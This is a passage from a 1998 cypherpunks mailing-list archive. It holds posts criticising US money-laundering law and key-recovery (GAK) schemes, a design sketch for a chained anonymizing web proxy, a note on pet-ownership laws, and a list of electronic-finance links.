$100,000 instead of $10,000.  He's got no reason to immediately notice that
it's'wrong.  He uses the U.S. mail.  That's mail fraud.  He asks his
secretary to see what she can do.  That's conspiracy.  He gets fed up and
calls the buyer who he thinks is a dead beat.  That's wire fraud.  In the
middle of the mess he changes his bank account from Bank of America to
Wells Fargo.  That's money laundering.  The buyer complains to a U.S.
attorney.  A grand jury indicts.  He's looking at something like 40 years.
The man's nearly in a coma that something like this could happen.  It's
Alice in Wonderland.  Naturally, all his money is seized and he can't
afford a private attorney and gets a competent but not overly zealous
federal public defender.  If the man had actually stolen $100,000, with
restitution and if it was his first offense, he get maybe a couple years.
Maybe probation.  But he doesn't even have the money!  Naturally, after a
few months in a federal detention facility (he can't make bail because the
feds have his assets) he starts listening to the other horror stories of
other fish caught in the net.  He sees what happens to them.  You fight and
there's a 98% chance that you lose.  And if you lose you get the maximum.
But if you plead out, we're looking at a slap on the wrist -- say a year or
two.  In his mind he hasn't committed anything even remotely like a crime
and he feels he completely innocent.  But he also knows that he's already
been in jail for about 1/2 of his sentence.  He vows to leave Amerika as
soon as he's out.  He perjures himself.  Admits his guilt under oath.  He
shows remorse for his crime.  The feds drop everything except some offense
that he can get a "5 and 5" -- five months in, five months on house arrest
(ankle bracelet).  He takes a felony hit on his record.  He loses all his
licenses.  He's ordered to pay costs of  $50.  He's already been in 5
months.  He's released the next day after they strap on the bracelet.  His
life is ruined.  His business is dead.  He is bankrupt.  The feds won't
give any of the money back unless he sues them.  He's got no money for an
attorney.  He's done.  This is not fiction.  This happens hundreds of times
a day all over this country.  Oh, did I mention the fine?  Yeah, it's only
$5000.  But here's the latest twist in federal jurisprudence.  The
Assistant U.S. Attorney has been to a new training program to insure
compliance with paying fines and restitution.  In his plea agreement the
new criminal has agreed that in the event he does not pay the fine on
schedule, the feds may retry him on ALL the original charges and he waives
double jeopardy.  Unconstitutional you say.  Sure.  But that's not what the
Supreme Court says.  Amerika.  Love it or leave it.

>> But I simply cannot comprehend the breadth of the agreement
>> on this dbs conference, and depth of conviction, that DBS money
>> should be designed with the **deliberate objective** of being
>> untraceable, for purposes of law enforcement or taxation.
>
>In the case of some DBS advocates you are overstating the matter.  In the
>case of others, vastly understating it.
>
>> I have a lot of respect for you guys' intellect but I think
>> you're wrong on two fundamental points:
>>
>> 1.  Rule of law.  Money laundering is a critical piece in
>> organized crime. The democratic countries have banking laws.
>> Do you think these laws should be followed, or NOT?  (Scurrying
>> of feet as all the DBS readers avoid answering.)
>
>Well let's examine this.  The view that all democratic countries have
>banking laws really begs the question.  "What are the differences between
>said laws."  I can tell you with solid authority, they are many.
>
>I've often repeated this story here and elsewhere.  It's all a matter of
>public record.
>
>Set the way-back-machine to just after Reagan has entered office.  Ole Ron
>began to crack down on tax evasion and in particular offshore havens.
>Taxes would be cut, it was reasoned, but only if loopholes were filled and
>evaders rooted out.  (Those of us old enough to remember might even recall
>nodding at the sense of it).
>
>This policy was particular hard on certain Caribbean nations.  This was the
>time of operation Tradewinds (search for it in the congressional record)
>and other IRS black projects where the IRS actually violated local law to
>spy on foreign banks even going so far as to drug guards, steal the
>briefcases of banking executives, perform unwarranted searches, bribe
>foreign officials and all manner of nonsense to root out tax evaders which
>might also be U.S. citizens.  For a long while there was a project which
>opened and Xeroxed all the incoming mail at JFK which appeared to originate
>from offshore havens.  This wasn't in the 50's mind you, but the 80s.  It
>was acts like these which prompted the Swiss to strengthen their banking
>secrecy during the Second World War.  Just another day in the park in the
>U.S.  Just recently this year Mexico nearly indicted several U.S. law
>officials for breaking Mexican law during the investigation of several
>Mexican banks.  Clearly the practice hasn't abated much in the last 15
>years..   (Note also that today all these methods (except for drugging
>guards maybe) have their legal equivalents in the United States, which is
>in itself a powerful statement).  This continued for some time back when
>Ron was at the helm until the United States finally began to threaten to
>revoke the U.S. charters of certain banks it considered uncooperative.  At
>this point a visitor, unannounced, flew into D.C. and literally dropped by
>the White House with no press coverage or fanfare at all in the late
>evening.  That visitor was Margaret Thatcher and she proceeded to explain
>to Ron over the course of a few hours that if he kept it up many of the
>British Protectorates would literally have their economies crippled.
>
>Literally overnight the matter was dropped and the offshore centers left to
>quietly continue their business.
>
>So much for democratic countries with universal ideas about banking law, or
>the rule of "law and order" in banking regulation.
>
>This is but one example.
>
>So:
>
>Rule of Law - means little in the global-political scheme of things
>Democratic Countries Have Banking Laws - none of which are consistent or
>consistently applied
>
>Money Laundering is a Key Piece of Organized Crime -
>
>This begs a definition of Money Laundering.  "Concealing the proceeds of a
>criminal act" sounds legitimate, but consider that it has been held to
>apply to a store clerk who sold food stamps for cash and deposited the
>proceeds in his personal (non-anonymous) checking account:  Indicted in
>Federal Court for Money Laundering with a maximum possible term of 35
>years.  (This is a prosecutorial tactic to get a guilty plea to the basic
>theft charge).  Consider also that third parties often take it on the chin
>with the wide definition currently applied.  Case in point: Ma and Pa
>travel agency innocently accepts a deposit from notorious attorney of drug
>dealer.  Their entire holding account is seized including the deposits of
>some 700 other potential travelers.  After 7 years of fighting the seizure,
>the money is finally returned, without interest.  (Effectively halfing the
>value of the funds).  The business is ruined, its reputation in tatters.
>Ma and Pa fight it out in bankruptcy, lose their house, most of their
>retirement proceeds, etc.  In the process this case sets the precedent that
>any amount of illicit funds ($1) deposited in any size account ($500
>million) will render the entire account liable to seizure and permit it to
>be held in lieu of forfeiture hearings.  That can go on for 7 years or so.
>Money which is "laundered" has its title literally revert to the U.S.
>Treasury.  This means third parties who innocently accept these funds are
>liable for their return, even if they are passed on in the course of
>business.  Beginning to seem silly?  Money laundering is an invented
>offense.  It's definition in the United States has grown so broad so as to
>be laughable, if not so frightening.  Do not think that these are isolated
>incidents.
>
>So, money laundering in its commonly understood sense might be key to
>organized crime, but what passes for money laundering in the United States
>has little to do with it.
>
>Myth:  Money Laundering laws have a serious impact on organized crime.
>
>This is increasingly nonsense.  The United States spends close to
>$22,000.00 to seize $1.00 of illicit funds.  Money Laundering today is
>extremely sophisticated and enforcement doesn't catch the drug dealers, it
>catches professional money launderers.  Today if you are a drug lord you
>drop $30 million in cash with a professional launderer who cuts you a
>"clean" check for 85% of that figure or so on the spot and takes the risk
>of laundering the funds on his own.
>
>Myth: Money Laundering can be detected accurately and effectively and leads
>to drug and organized crime convictions.
>
>Nonsense.  Assume for sake of argument that you could detect 99% of
>fraudulent transactions with the measures in place (entirely impossible)
>and that your false positive rate was only 1% (also entirely impossible).
>SWIFT alone processes $2 trillion per day.  That's on the order of $600
>trillion per year, just in SWIFT.  (Add another $1.3 billion for CHIPS and
>$989 million for Fedwire daily.  Oh, don't forget the foreign exchange
>markets, oh and NYSE, oh and NASDAQ, oh and international letters of
>credit, oh and...)  The most sinister estimates of the global criminal
>economy (primarily drug money) run around $400 billion per year.  Your
>false positives will identify $6 trillion in naughty funds that are
>actually pure just in SWIFT.  Your correct hits will identify $396 billion
>in naughty funds in all systems worldwide.  In this example you will have
>15 times as many false hits as correct hits ignoring the lionshare of world
>financial systems.  This is under the very best of circumstances.  It's a
>losing game..  It's a game only the mathematically challenged or
>politically motivated will play.  In fact, money laundering is a tack on
>offense that is brought to bear after an arrest on other charges has been
>made.  The number of cases that originate with a money laundering
>investigation is vanishingly small.
>
>The payment system today eats up over 1.5% of the GNP primarily because of
>nonsense regulations like CTR's and other transaction reporting
>requirements which can cost up to $15 per transaction and (as we see above)
>have little if any effect on professional money laundering.  Given these
>numbers the degree of "fraud" in the world financial system is far better
>than in the credit card system, which has pretty much reached equilibrium.
>(Fraud accounts for about 5% of credit card costs.  Customer service
>accounts for about 15%).
>
>> There is a certain logic in the notion of having a legislative
>> process and laws.  Our laws in the U.S. weren't written by
>> angels up in heaven, but they are better than some other places.
>
>In the case of money laundering regulation I should say almost _no_ other
>places.
>
>> If DBS participants advocate that money laundering laws are
>> not to be followed, I'm sorry but YOU GUYS have the burden
>> of logically arguing your position.  So shut up and quit
>> raggin' on *me* about it.
>
>I would just like to see them applied with rationality.  It's fairly clear
>that that's too much to ask of the United States.  Interestingly enough
>it's typically multi-party systems of government that have a balanced
>approach to money laundering.  Perhaps this is because grandstanding with
>things like "the war on drugs" isn't as effective outside of a two party
>system.  Sheds new light on your comment about democracies and banking
>regulations.
>
>Some jurisdictions get along quite well without the nonsense perpetrated in
>the United States.  Like Switzerland.  Switzerland has one of the nicest
>things in a cash economy I have seen.  A freely circulated 1000CHF note.
>It's worth about $750.  (The United States phased out $500 bills long ago
>to deal with laundering).  In Switzerland you can drop a 1000CHF note at a
>restaurant and no one bats an eye.  In the U.S. you cant take a cab home
>from the International Terminal unless you have something smaller than a
>$50.  Somehow Switzerland has manage to survive without looting in the
>streets and rampant crime.  Luxembourg is in a similar situation.
>
>I tried to purchase a car some years ago outside of D.C. with cash.
>Completely legitimate transaction.  No interest nonsense for me to worry
>about.  No waiting for the car while the check clears.  Simple.  Right?
>The dealership called the police, convinced they were striking a blow
>against drug dealers.
>
>It's really gone too far.
>
>> 2.  Practicality.   Without at least a fig leaf of cooperation
>> with banking authorities and other police, DBS will not be
>> permitted.  Transactions denominated in DBS won't be enforceable
>> in courts, and fraud won't be a crime.  Reporting fraud in DBS
>> deal would be like reporting a fraud in purchase of heroin.
>
>Practicality?
>
>Of course any student of political science will understand that where
>government enforcement of contracts fails or falls short, organized crime
>tends to move in.  Reporting fraud in the purchase of heroin to the right
>enforcement cartel tends to be much more effective in rendering results
>than U.S. courts I'd wager.  Clearly, the United States would not benefit
>by forcing DBS underground.  Several jurisdictions will permit DBS and
>enforce it.  (I'm involved in the legislative process for one such law in a
>European jurisdiction now).  If you believe that DBS should be outlawed
>then you must agree that cash should be outlawed.  There is effectively no
>difference but velocity.
>
>> The principal reason for failure of electronic money, other
>> than cards used in physical establishments, is you can't trust
>> the seller to send you the goods.  That's why everybody is
>> using credit cards, and bearing the 2-3% charge for "insurance".
>>
>> You guys seem to think untraceable DBS will be accepted, if
>> only a good enough encryption algorithm can be found????
>
>1% of the GNP.  Instant 1% growth for changing a system of clearing.  Think
>about that for awhile.
>
>> I think your ideas have a fatal, logical weakness.  Without
>> any practical means to verify who got your money, or even
>> a legal *right* to enforce a contract, what good is dbs?
>> It's not even money.  It's more like a coupon or something.
>
>What you are missing is that all your arguments apply equally to cash.  Why
>is cash used if this is so?  Prove to me that you just gave me six $100
>bills.  You are, "without any practical means to verify who got your money
>or even a legal *right* to enforce a contract" if the transaction is larger
>than $500.
>
>If only we could be rid of this pesky cash would could eliminate organized
>crime forever.
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 14 Nov 1998 16:03:39 +0800
To: "Jean-Francois Avon" <libre@colba.net>
Subject: Re: Fwd: Turtles and Rocks(s)
In-Reply-To: <199811131844.NAA01899@cti06.citenet.net>
Message-ID: <3.0.5.32.19981113232903.007da2d0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



The Libertarian Party of California is on record as being in favor of
re-legalizing ferrets, which are not legal pets in California,
though officials apparently look the other way while pet stores
blatantly aid and abet illegal ferret-possession.

Their most recent press release on the subject was titled
	Release: Ferrets
(There is no formal record of the Republican response to
this obvious terrorist threat, or whether the Green Party's
position was more strongly influenced by animal rights activists
who support releasing ferrets or deep ecologists who don't
want the non-native wild animals more widely dispersed :-)


At 01:43 PM 11/13/98 -0500, Jean-Francois Avon wrote:
>==================BEGIN FORWARDED MESSAGE==================
>>Date: Fri, 13 Nov 1998 06:37:41 -0500
>>From: Dan MacInnis <dan.louise@sympatico.ca>
>
>November 12th, 1998 the Toronto Board of Health announces they want to
>ban private 
>owner ship of snakes, turtles, any and all exotic pets.
>
>Reaction of pet owners was immediate. In this city of just under 3
>Million people, most said they would not abide by the law and hide their
>beloved pets.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 14 Nov 1998 08:29:24 +0800
To: cypherpunks@cyberpass.net
Subject: nCipher joined KRAP/GAK drive too?
Message-ID: <199811132348.XAA27396@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




This arose out of a discussion on ukcrypto about NAI (which PGP Inc is
now part of) having recently rejoined the KRA list -- I notice that
nCipher are on it too, and there was a earlier exchange on ukcrypto
about nCipher...

=========

nCipher too are now on the KRAP list (wonder how long for?)

Bruce Tober forwards from www.kra.org:
> [...]
>          nCipher Corporation Ltd.

nCipher fairly recently made some press release that was commented on
on this list as sounding a bit in favour of UK/DTI/GCHQ GAK attempts.
Then they claimed that it was just being read incorrectly and the text
was neutral and the title that was badly chosen and by hired PR.

So nCipher guys, how do you explain the membership of KRAP away?

>From the last list discussion, Ian Jackson, who works for nCipher wrote:

: We do not have any weakened or GAK products.  The Marketing Director
: has assured me that we have no plans to produce any.

also:

: So, in summary, there are no artificial restrictions on the sizes of
: keys which can be used, generated or stored by our units, and no
: backdoor GAK or key recovery facilities.

given the KRAP membership one might have cause to be worry that this
may not still be true.  Perhaps people using recent nCipher boards or
with recent software upgrades ought to read the specs real closely --
to see if it admits to encrypting stuff to GCHQ also!

Ian also wrote (in a post marked as not an official nCipher statement):
: I personally would feel that putting deliberate backdoors or other
: similar things into our products would be highly unethical and I would
: have nothing to do with it.

and:
: This has nothing to do with the spooks or escrow or anything of the
: kind.  

That's what GAK and KRAP is all about -- putting backdoors into
products which the government and secret service groups like GCHQ,
NSA and ECHELON get the keys to.

and:
: I do believe that the personal views of senior management at
: nCipher - particularly towards the technical end - are opposed to
: escrow et al.

Perhaps those technical types could have a go at prevailing over
whichever marketing type or suit decided to sign up for KRAP.

This is not intended to attack Ian, as he seemed pretty much against
GAK, and Niko van Someren to some extent too.  Not so sure about the
other non technical can Someren, but clearly someone in nCipher thinks
KRAP and GAK are a good marketing ploy.

Otherwise, I figure you're better off giving money to DEC alpha than
supporting GAKkers.  Alpha's run SSLeay pretty fast.

Adam

=========

and a second post, with more specifics:

=========

I wrote:
> nCipher too are now on the KRAP list (wonder how long for?)

here we go:

        http://www.ncipher.com/news/files/press/97/keyrecov.html

since May 97!

contains such gems as:
:       We are delighted to support the Key Recovery Alliance," said
:       Alex van Someren, President of nCipher. 

so that pin-points at least one GAK enthousiast at nCipher.

It also makes for some rather strange contradictions.  The flap about
nCiphers apparent whole-hearted support for DTI GAK attempts was May
this year -- nCipher had already been a paid up KRAP member for a
whole year.

press release continues (least there is any confusion as to what KRA
as an organisation is about):

: Encryption makes information readable only to a person holding a
: unique "key" which will unlock the data. Encryption is critical to
: ensure the security of sensitive information that is either stored
: electronically or sent over public networks such as the Internet.
: Key recovery is a new method that allows for authorized access
: to encrypted information without the need to store or "escrow"
: any encryption keys with a third party. Key recovery is an
: effective tool to meet commercial, private and institutional needs.

institutions obliquely mentioned being presumably the likes of GCHQ 
and NSA?

yet Ian was saying:
> : So, in summary, there are no artificial restrictions on the sizes of
> : keys which can be used, generated or stored by our units, and no 
> : backdoor GAK or key recovery facilities.

saying there were no key recovery facilities, and

: We do not have any weakened or GAK products.  The Marketing Director
: has assured me that we have no plans to produce any.

and no plans to install any.  yet this is what KRA is all about, and they
were signed up to it already at that time.

I suppose someone is now going to try to claim that KRA is all about
key recovery for commercial purposes, but not for government -- but
this is not the way I understand that KRA came into being at all.

I think it is very much a NSA led attempt to further the clipper
attempts.  If I recall it started in the wake of the NSA/NIST attempts
at clipper IV (or whatever number it was at by then) to coerce
companies into including software based key escrow.

Probably tied up with the permission to use marginally higher key
lengths if the company can demonstrate to NSA a plan to introduce GAK
in two year time scale (within the US), though I may be forgetting the
details.  Anyone like to clarify KRAs aims and history?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 14 Nov 1998 08:38:03 +0800
To: stevem@tightrope.demon.co.uk
Subject: NAI(L) in PGPs coffin (Re: network associates back in kra)
In-Reply-To: <19981113201903.A25115@tightrope.demon.co.uk>
Message-ID: <199811140004.AAA27507@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Steve Mynott writes:
> subject says it all
> 
> roll on gpg

NAI rejoining KRAP would be something of a gift for any competitors of
PGP producing PGP compabile replacements if there were any serious
contenders.  

Or perhaps for S/MIME vendors, if they weren't already mostly KRAP
members, or pretty neutral / prone to be bribed by defense contracts,
and if S/MIME and PKIX weren't so hierarchical in design:

I'm not sure S/MIME based offerings are much of an alternative because
the hierarchical model, and ability of a CA to restrict what the end
user can use keys for (not for certification for example), and
generally inability to use clients without cert obtained from another
KRA member -- verisign, all add up to bad news.  The whole mess can be
controlled by GAKkers via the CA, and the CAs are the target for
example of the UK GAK attempt being led by the DTI (Department of
Trade and Industry -- meant to be representing industry, but instead
trying it's level best to put GCHQ / ECHELON interests ahead of
business interests, as acknowledged by DTI winning Privacy
International's hall of shame award.).

To expand briefly on the UK (DTI) current proposal: it seems to be
that they are trying to stack the deck by giving signatures made with
a key certified by a UK government "licensed" CA given better
recognition in law than signatures made by an unlicensed CA.  The
licensed CA doesn't have to escrow signatures keys, but if it does and
provides any service relating to confidentiality keys also it must
also keep private keys.  (Deliverable to GCHQ / ECHELON within 1 hr 24
hours a day 365 days a year -- GAK on steroids).

Someone on ukcrypto coined the phrase `licensed to leak' to express
the government coerced baggage that goes with a licensed CA.

Indeed roll on the GPG.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 14 Nov 1998 16:39:15 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: Free Email as Anonymous Remailer Re: NPR is at it again...
In-Reply-To: <3.0.5.32.19981111015237.0079f350@idiom.com>
Message-ID: <3.0.5.32.19981114002632.007caa30@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:47 PM 11/11/98 +0100, Lucky Green wrote:
>On Wed, 11 Nov 1998, Bill Stewart wrote:
>> An interesting project would be a free low-volume anonymizer cgi for Apache,
>> given the large number of current users and the much larger number
>> of people who will run web servers once they have cable modems.
>How do you do chaining with a cgi?

Looks easy enough to do, if a bit ugly, where "ugly" is somewhat equivalent to
"build yet another local proxy widget to hide the gory details",
though it's not really much uglier than doing a good anonymizer,
and getting details like cookies and Java/script right are harder.

Define "encrypted" as "PGP or something like it".  It may be possible
to gain some efficiencies by using SSL, but not critical.
Take a cgi script and use POST to hand it an encrypted block containing:
	Response-Key:  
	HTTP Request, either vanilla URL or cgi URL with GET or POST data.
	Maybe some digicash
	Maybe some additional data
The script fetches the URL, handing along any data,
packages the response in HTTP reply format, and encrypts it with the 
response key for the client proxy to unpack.

To chain these, have the client nest the requests, doing a
URL that points to another anonymizer script and POSTs an encrypted block.
Eventually you'll get to a non-anonymizing URL;
it may be interesting to include any expected cookies in the block,
so the client can hand them to the destination web server,
or to gain some efficiencies by having the cgi script fetch
any IMG requests, and sending a bundle of HTTP reply packets
instead of just a single one.

The problems - 
- How can easily can you break the system?  
--- Does it leave too many open connections that can be followed?
--- Does the decreasing size of the requests and
	increasing size of responses make it too easy to trace?
--- What other obvious security holes are there?
- Timeouts or other problems?
- Denial of service attacks?

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 14:33:58 +0800
To: cypherpunks@cyberpass.net
Subject: New Electronic Financial Services Links
Message-ID: <v04020a07b272c616c29f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: johnmuller@mail.earthlink.net
Date: Fri, 13 Nov 1998 16:11:55 -0800
To: e-carm@c3po.kc-inc.net, dbs@philodox.com, dcsb@ai.mit.edu
From: John Muller <johnmuller@earthlink.net>
Subject: New Electronic Financial Services Links
Mime-Version: 1.0
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

New links that will shortly be added to the ABA Joint Subcommittee on
Electronic Financial Services Web site (http://www.abanet.org/buslaw/efss),
in no particular order:


Dept. of Commerce request for input on data privacy principles "safe harbor"
http://www.ita.doc.gov/ecom/menu.htm

SEC announces 23 enforcement actions for Internet stock fraud
http://www.sec.gov/news/netfraud.htm

RISKS Digest Vol. 20 No. 6, Dan Geer - "Risk Management is Where the Money Is"
http://catless.ncl.ac.uk/Risks/20.06.html

European Commission proposes a directive on distance selling of financial
services
http://europa.eu.int/comm/dg15/en/finances/consumer/891.htm

European Commission proposes a framework for the European financial
services sector to facilitate cross-border operation
http://europa.eu.int/comm/dg15/en/finances/general/fsen.htm

European Commission press release:  the EU Data Protection Directive takes
effect
http://europa.eu.int/comm/dg15/en/media/dataprot/news/925.htm

Federal Reserve announcement on enhanced settlement services
http://www.bog.frb.fed.us/boarddocs/press/BoardActs/1998/19981103/

Federal Reserve announcement of reduction in fees for electronic payment
services
http://www.bog.frb.fed.us/boarddocs/press/BoardActs/1998/19981104/

OTS policy statement on privacy of customer information
http://www.ots.treas.gov/docs/77879.html

Journal of Information Law and Technology issue on Globalisation and
E-commerce
http://elj.warwick.ac.uk/jilt/issue/1998_3/default.htm

Papers from the 21st National Information Systems Security Conference
http://csrc.nist.gov/nissc/1998/papers.html

BCI - Northern Trust 2nd Circuit case under UCC Article 4A and common law
seeking a return of funds from an electronic funds transfer
http://www.law.pace.edu/lawlib/legal/us-legal/judiciary/second-circuit/test3
/97-7633.opn.html

Hogan Systems v. Cybresource 5th Circuit decision on copyright and trade
secret claims arising out of third party contractor use of software
licensed to a bank
http://laws.findlaw.com/5th/9710645CV0.html

FTC comments on proposed UCC Article 2B
http://www.ftc.gov/be/v980032.htm

The ERISA Industry Committee comments to the IRS on the use of new
technologies in retirement plans
http://www.eric.org/testimony/technologies.htm

Council of Europe - model contract clauses on transborder data flows
http://www.coe.fr/dataprotection/ectype.htm

E*Trade invests in International Securities Exchange, an electronic options
exchange in development
http://www.etrade.com/cgi-bin/gx.cgi/AppLogic+Home?gxml=pr111098c.html

Electronic Markets Vol. 11 No. 3 on electronic contracting
http://www.electronicmarkets.org/netacademy/publications.nsf/all_pk/929

Adrian McCullagh article on Trust in Electronic Commerce
http://www.acs.org.au/president/1998/past/io98/etrust.htm

CheckFree and others form the Electronic Banking Association
http://www.e-banking.org/


John Muller
johnmuller@earthlink.net
"Things are not as they seem, neither are they otherwise"

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Nov 1998 14:36:17 +0800
To: cypherpunks@cyberpass.net
Subject: DBS, Privacy, Money Laundering nonsense.
Message-ID: <v04020a0ab272c8825466@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Long-time DCSBers will remember Unicorn's talk on money laundering to us a
few years ago...

This more recent rant of his on the Digital Bearer Settlement list is about
the best articulation of his position that I've seen him write.

Cheers,
Bob Hettinga


--- begin forwarded text


From: "Black Unicorn" <unicorn@schloss.li>
To: <tboyle@rosehill.net>, "dbs" <dbs@philodox.com>
Subject: DBS, Privacy, Money Laundering nonsense.
Date: Fri, 13 Nov 1998 22:57:51 -0600
Keywords: dbs
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

tboyle@rosehill.net comments:

[...]

> But I simply cannot comprehend the breadth of the agreement
> on this dbs conference, and depth of conviction, that DBS money
> should be designed with the **deliberate objective** of being
> untraceable, for purposes of law enforcement or taxation.

In the case of some DBS advocates you are overstating the matter.  In the
case of others, vastly understating it.

> I have a lot of respect for you guys' intellect but I think
> you're wrong on two fundamental points:
>
> 1.  Rule of law.  Money laundering is a critical piece in
> organized crime. The democratic countries have banking laws.
> Do you think these laws should be followed, or NOT?  (Scurrying
> of feet as all the DBS readers avoid answering.)

Well let's examine this.  The view that all democratic countries have
banking laws really begs the question.  "What are the differences between
said laws."  I can tell you with solid authority, they are many.

I've often repeated this story here and elsewhere.  It's all a matter of
public record.

Set the way-back-machine to just after Reagan has entered office.  Ole Ron
began to crack down on tax evasion and in particular offshore havens.
Taxes would be cut, it was reasoned, but only if loopholes were filled and
evaders rooted out.  (Those of us old enough to remember might even recall
nodding at the sense of it).

This policy was particular hard on certain Caribbean nations.  This was the
time of operation Tradewinds (search for it in the congressional record)
and other IRS black projects where the IRS actually violated local law to
spy on foreign banks even going so far as to drug guards, steal the
briefcases of banking executives, perform unwarranted searches, bribe
foreign officials and all manner of nonsense to root out tax evaders which
might also be U.S. citizens.  For a long while there was a project which
opened and Xeroxed all the incoming mail at JFK which appeared to originate
from offshore havens.  This wasn't in the 50's mind you, but the 80s.  It
was acts like these which prompted the Swiss to strengthen their banking
secrecy during the Second World War.  Just another day in the park in the
U.S.  Just recently this year Mexico nearly indicted several U.S. law
officials for breaking Mexican law during the investigation of several
Mexican banks.  Clearly the practice hasn't abated much in the last 15
years..   (Note also that today all these methods (except for drugging
guards maybe) have their legal equivalents in the United States, which is
in itself a powerful statement).  This continued for some time back when
Ron was at the helm until the United States finally began to threaten to
revoke the U.S. charters of certain banks it considered uncooperative.  At
this point a visitor, unannounced, flew into D.C. and literally dropped by
the White House with no press coverage or fanfare at all in the late
evening.  That visitor was Margaret Thatcher and she proceeded to explain
to Ron over the course of a few hours that if he kept it up many of the
British Protectorates would literally have their economies crippled.

Literally overnight the matter was dropped and the offshore centers left to
quietly continue their business.

So much for democratic countries with universal ideas about banking law, or
the rule of "law and order" in banking regulation.

This is but one example.

So:

Rule of Law - means little in the global-political scheme of things
Democratic Countries Have Banking Laws - none of which are consistent or
consistently applied

Money Laundering is a Key Piece of Organized Crime -

This begs a definition of Money Laundering.  "Concealing the proceeds of a
criminal act" sounds legitimate, but consider that it has been held to
apply to a store clerk who sold food stamps for cash and deposited the
proceeds in his personal (non-anonymous) checking account:  Indicted in
Federal Court for Money Laundering with a maximum possible term of 35
years.  (This is a prosecutorial tactic to get a guilty plea to the basic
theft charge).  Consider also that third parties often take it on the chin
with the wide definition currently applied.  Case in point: Ma and Pa
travel agency innocently accepts a deposit from notorious attorney of drug
dealer.  Their entire holding account is seized including the deposits of
some 700 other potential travelers.  After 7 years of fighting the seizure,
the money is finally returned, without interest.  (Effectively halfing the
value of the funds).  The business is ruined, its reputation in tatters.
Ma and Pa fight it out in bankruptcy, lose their house, most of their
retirement proceeds, etc.  In the process this case sets the precedent that
any amount of illicit funds ($1) deposited in any size account ($500
million) will render the entire account liable to seizure and permit it to
be held in lieu of forfeiture hearings.  That can go on for 7 years or so.
Money which is "laundered" has its title literally revert to the U.S.
Treasury.  This means third parties who innocently accept these funds are
liable for their return, even if they are passed on in the course of
business.  Beginning to seem silly?  Money laundering is an invented
offense.  It's definition in the United States has grown so broad so as to
be laughable, if not so frightening.  Do not think that these are isolated
incidents.

So, money laundering in its commonly understood sense might be key to
organized crime, but what passes for money laundering in the United States
has little to do with it.

Myth:  Money Laundering laws have a serious impact on organized crime.

This is increasingly nonsense.  The United States spends close to
$22,000.00 to seize $1.00 of illicit funds.  Money Laundering today is
extremely sophisticated and enforcement doesn't catch the drug dealers, it
catches professional money launderers.  Today if you are a drug lord you
drop $30 million in cash with a professional launderer who cuts you a
"clean" check for 85% of that figure or so on the spot and takes the risk
of laundering the funds on his own.

Myth: Money Laundering can be detected accurately and effectively and leads
to drug and organized crime convictions.

Nonsense.  Assume for sake of argument that you could detect 99% of
fraudulent transactions with the measures in place (entirely impossible)
and that your false positive rate was only 1% (also entirely impossible).
SWIFT alone processes $2 trillion per day.  That's on the order of $600
trillion per year, just in SWIFT.  (Add another $1.3 billion for CHIPS and
$989 million for Fedwire daily.  Oh, don't forget the foreign exchange
markets, oh and NYSE, oh and NASDAQ, oh and international letters of
credit, oh and...)  The most sinister estimates of the global criminal
economy (primarily drug money) run around $400 billion per year.  Your
false positives will identify $6 trillion in naughty funds that are
actually pure just in SWIFT.  Your correct hits will identify $396 billion
in naughty funds in all systems worldwide.  In this example you will have
15 times as many false hits as correct hits ignoring the lionshare of world
financial systems.  This is under the very best of circumstances.  It's a
losing game..  It's a game only the mathematically challenged or
politically motivated will play.  In fact, money laundering is a tack on
offense that is brought to bear after an arrest on other charges has been
made.  The number of cases that originate with a money laundering
investigation is vanishingly small.

The payment system today eats up over 1.5% of the GNP primarily because of
nonsense regulations like CTR's and other transaction reporting
requirements which can cost up to $15 per transaction and (as we see above)
have little if any effect on professional money laundering.  Given these
numbers the degree of "fraud" in the world financial system is far better
than in the credit card system, which has pretty much reached equilibrium.
